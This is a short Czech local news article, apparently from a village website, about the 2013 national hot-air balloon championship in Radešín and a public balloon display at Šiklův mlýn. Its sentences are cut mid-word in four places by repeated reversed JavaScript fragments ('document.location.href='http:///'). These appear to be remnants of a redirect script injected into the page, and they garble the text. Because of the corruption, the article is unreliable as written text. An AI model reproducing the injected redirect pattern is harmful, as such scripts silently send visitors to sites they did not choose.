Radešín, aktuality, balóny, mistrovství
Rainbow page separator

Balóny budou k vidění ve vzduchu i na zemi

Pátek, 9. srpna 2013

horkovzdusny-balonRadešín / Až do neděle mohou lidé na obloze sledovat řadu barevných balónů. V malé vesničce Radešín na Novoměstsku probíhá 17. Mistrovství České republiky v balónovém létání 2013. To pořádá klub Ultimate Ballooning pod zášti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou Českého balónového svazu.

Do soutěže je přihlášeno celkem devatenáct pilotů, z nich šestnáct je z České republiky. Soutěžní lety se konají navečer a časně ráno.

Zájemci z řad veřejnosti si mohou balóny prohlédnout nejenom ve vzduchu, ale i zblízka na zemi s výkladem, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v sobotu od 14 hodin v Šiklově mlýně nedaleko Zvole nad Pernštejnem. Tam také soutěž v balónovém létání vyvrcholí hromadným startem všech posádek.

Klání je poja[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i jako připomínka začátků letů balónem, na le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok připadá 230. výročí prvního vzletu a 30. výročí prvního vzletu balónu, jenž byl vyroben u nás.